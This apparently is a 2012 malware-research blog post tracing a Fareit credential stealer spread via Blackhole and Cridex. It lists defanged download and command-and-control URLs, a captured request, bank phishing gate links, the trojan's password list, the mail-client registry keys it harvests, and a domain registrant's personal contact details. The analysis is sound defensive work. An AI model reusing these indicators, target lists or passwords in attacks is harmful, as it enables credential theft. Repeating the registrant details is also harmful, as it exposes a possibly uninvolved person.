Saturday, December 22, 2012

The Crime Still Goes On: Trojan Fareit Credential Stealer - New Server, Same Group, Same Game (via BHEK/Cridex)

As per posted A WEEK AGO here -->>[Prev.Post] that Crime Group STILL infects victims.
The infector concepts and binary works is exactly the same as previous,

Infection Source Summary & Trojan Communication Info

Spam infector:
URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm Server: Apache, WordPress IP: 50.116.98.44
Blackhole:
Landing: h00p://latticesoft.net/detects/continues-little.php Server: nginx/1.3.3 Date: Fri, 21 Dec 2012 18:44:29 GMT Content-Type: text/html X-Powered-By: PHP/5.3.14 IP: 59.57.247.185
Trojan Cridex (payload) download url:
h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d
Trojan Fareit Download Source:
h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 
h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1 
h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
*) With all Proxy's Port/Server: 8080 / nginx/1.0.10
Trojan Fareit Stealer Download PoC is as example below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
...?f/.....0N}a.9.Je...U;0..
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Trojan Fareit Callbacks IP:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
CNC is 62.76.177.51, PoC:
// Credentials sent CnC panel
var adminPanelLocation = 
'h00p://62.76.177.51/if_Career/';

//Data Modify Process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8

// Phishing Credentials urls
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
CnC Passwords(reversed from Trojan Fareit):
phpbb      john316      pass        slayer     
qwerty     richard      aaaaaa      wisdom     
jesus      blink182     amanda      praise     
abc123     peaches      nothing     zxcvbnm    
letmein    cool         ginger      samuel     
test       flower       mother      mike       
love       scooter      snoopy      dallas     
password1  banana       jessica     green      
hello      james        welcome     testtest   
monkey     asdfasdf     pokemon     maverick   
dragon     victory      iloveyou1   onelove    
trustno1   london       mustang     david      
iloveyou   123qwe       helpme      mylove     
shadow     startrek     justin      church     
christ     george       jasmine     friend     
sunshine   winner       orange      god        
master     maggie       testing     destiny    
computer   trinity      apple       none       
princess   online       michelle    microsoft  
tigger     123abc       peace       bubbles    
football   chicken      secret      cocacola   
angel      junior       grace       jordan23   
jesus1     chris        william     ilovegod   
whatever   passw0rd     iloveyou2   football1  
freedom    austin       nicole      loving     
killer     sparky       muffin      nathan     
asdf       admin        gateway     emmanuel   
soccer     merlin       fuckyou1    scooby     
superman   google       asshole     fuckoff    
michael    friends      hahaha      sammy      
cheese     hope         poop        maxwell    
internet   shalom       blessing    jason      
joshua     nintendo     blahblah    john       
fuckyou    looking      myspace1    1q2w3e4r   
blessed    harley       matthew     baby       
baseball   smokey       canada      red123     
starwars   joseph       silver      blabla     
purple     lucky        robert      prince     
jordan     digital      forever     qwert      
faith      thunder      asdfgh      chelsea    
summer     spirit       rachel      angel1     
ashley     bandit       rainbow     hardcore   
buster     enter        guitar      dexter     
heaven     anthony      peanut      saved      
pepper     corvette     batman      hallo      
hunter     hockey       cookie      jasper     
lovely     power        bailey      danielle   
andrew     benjamin     soccer1     kitten     
thomas     iloveyou!    mickey      cassie     
angels     1q2w3e       biteme      stella     
charlie    viper        hello1      prayer     
daniel     genesis      eminem      hotdog     
jennifer   knight       dakota      windows    
single     qwerty1      samantha    mustdie    
hannah     creative     compaq      gates      
qazwsx     foobar       diamond     billgates  
happy      adidas       taylor      ghbdtn     
matrix     rotimi       forum       gfhjkm   hgTYDOMium

Analysis Summary & Research Materials

This time I dump every memory of Trojan Fareit in txt here-->>[PASTEBIN] ↑So you can see which FTP, File, POP/SMTP Credentials data's licked & grabbed - as evidence of this evil stealer crime. Additionally see the Fareit Trojan's config here -->>[PASTEBIN] ↑You can confirm targeted online banks info + phishing html codes these actors used. There is slight BHEK changes in PluginDetect Obfuscated Code (Landing Page), I cracked manually with wrote GUIDANCE to decode here -->>[PASTEBIN] PluginDetect before -->>[PASTEBIN] & after decoded-->>[PASTEBIN] Payload binary static & dynamic analysis text(a quicky) -->>[PASTEBIN] Sample download is here -->>[MEDIAFIRE] Captures data is here (PCAP, RegShot, MEMShot, etc)-->>[MEDIAFIRE]

Account Phishing Act by current version Trojan

Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!

PoC of all possible Email Credentials Also Grabbed

In the previous case, I have strong request to check not only http/ftp/server login, but E-Mail credential. Here we go:
POP3_Password2
SMTP_Password2
IMAP_Password2
HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\RimArts\B2\Settings
DataDir
DataDirBak
Mailbox.ini
Software\Poco Systems Inc
Path
\PocoSystem.ini
Program
DataPath
accounts.ini
\Pocomail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
\BatMail
\The Bat!
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
Working Directory
ProgramDir
Count
Default
Dir #%d
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords identities

Virus Total Detection Ratio

Landing Page: (3/45) ---->>[VirusTotal] Trojan Cridex Downloader: (15/44) ---->>[VirusTotal] Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]

PoC / Analysis ScreenShots

Malware processes: Payload after self copied(dropped) into %AppData%\ Network HTTP Traffic captured: Need to fix the binary before reversing properly...
//Very annoying anti-reverse....
   :         :                           :
0x00003cf2 (01) 47                     INC EDI
0x00003cf3 (01) 5c                     POP ESP
0x00003cf4 (05) a9 2835b437            TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8                 PSLLD MM7, MM0
0x00003cfc (01) 4b                     DEC EBX
0x00003cfd (01) 95                     XCHG EBP, EAX
0x00003cfe (02) b2 f9                  MOV DL, 0xf9
0x00003d00 (01) ef                     OUT DX, EAX
0x00003d01 (01) 51                     PUSH ECX
0x00003d02 (01) ac                     LODSB
0x00003d03 (01) 46                     INC ESI
0x00003d04 (02) 71 77                  JNO 0x00003d7d   ; 1
0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71                  JB 0x00003d79    ; 2
0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72                  JA 0x00003d7c    ; 3
0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77                  JNO 0x00003d83   ; 4
0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71                  JB 0x00003d7f    ; 5
  :          :    :                     :    :     :
3CE8   50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4    PDD3.$..b'G..(5.
3CF8   37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71    7...K....Q.Fqwrq
3D08   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw // This qwrqwr :-(((
3D18   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D28   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
3D38   77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77    wrqwrqwrqwrqwrqw
3D48   72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72    rqwrqwrqwrqwrqwr
3D58   71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71    qwrqwrqwrqwrqwrq
  :                             :                            :

PoC of the same group as previous case

Seriously, it uses the same NS server registered by same person..
// latticesoft.net < dns search  

;; QUESTION SECTION:
;latticesoft.net.               IN      ANY

;; ANSWER SECTION:
latticesoft.net.        900     IN      A       59.57.247.185
latticesoft.net.        900     IN      SOA     ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; AUTHORITY SECTION:
latticesoft.net.        900     IN      NS      ns2.amishshoppe.net.
latticesoft.net.        900     IN      NS      ns1.amishshoppe.net.

;; ADDITIONAL SECTION:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

//PoC that currently infector domain is in service:
a.root-servers.net. (198.41.0.4)
 |\___ i.gtld-servers.net [net] (192.43.172.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) Got authoritative answer
 |\___ l.gtld-servers.net [net] (192.41.162.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ m.gtld-servers.net [net] (192.55.83.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ k.gtld-servers.net [net] (192.52.178.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ h.gtld-servers.net [net] (192.54.112.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ b.gtld-servers.net [net] (2001:0503:231d:0000:0000:0000:0002:0030) Not queried
 |\___ b.gtld-servers.net [net] (192.33.14.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ e.gtld-servers.net [net] (192.12.94.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ j.gtld-servers.net [net] (192.48.79.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ a.gtld-servers.net [net] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried
 |\___ a.gtld-servers.net [net] (192.5.6.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ g.gtld-servers.net [net] (192.42.93.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ f.gtld-servers.net [net] (192.35.51.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
 |\___ c.gtld-servers.net [net] (192.26.92.30)
 |     |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |      \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
  \___ d.gtld-servers.net [net] (192.31.80.30)
       |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
        \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)

//Historical/pDNS related IP-Domain Info:
eaglepointecondo.org  A  59.57.247.185
latticesoft.net       A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl A  59.57.247.185

// Check AXFR (see whether anyone can changed records w/2ndary DNS)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server:         8.8.8.8
Address:        8.8.8.8#53

// WHOIS Database of DNS Service Domain....

Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

// Registrant Database Checks...
Registrant:

   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: amishshoppe.net
   Created on..............: 2012-11-15
   Expires on..............: 2013-11-15

Administrative Contact:
   Steve Burandt
   0n430 Peter Rd
   Winfield, IL 60190
   US
   Phone: +1.6304626711
   Email: solaradvent@yahoo.com

Technical  Contact:
   Registercom
   Domain Registrar
   12808 Gran Bay Pkwy
   West Jacksonville, FL 32258
   US
   Phone: +1.9027492701
   Email: domainregistrar@register.com

DNS Servers:
   ns2.amishshoppe.net
   ns1.amishshoppe.net

#MalwareMustDie

3 comments:

  1. Connection: Keep-Alive
    Cache-Control: no-cache
    ...?f/.....0N}a.9.Je...U;0..
    :

    /key to disabling, no? shows a recursive call with a hash following command Cache-Control: no-cache.../

    ReplyDelete
  2. I think you were referring when cridex called fareit server to download's packet parts.
    Let's see the whole PCAP packet data to be precise, this is the download path: http://www.mediafire.com/?k3uljvwj9kk4wnz
    When the first incoming packet was almost stopped, the %temp% data-chunks was shown, when it 100% stopped the exe found in %temp%, at the same time the registry long binary textual data also come into vision. Kind of afraid in making mistakes so I was running it 4(four) times myself to be sure about the sequence of this part.

    ReplyDelete
  3. The show still goes on..

    New IP/domains:
    91.224.135.20, 187.85.160.106, 82.165.193.26:
    belnialamsik.ru
    demoralization.ru
    bananamamor.ru
    Evidence: http://pastebin.com/raw.php?i=TUKqDU3N

    ReplyDelete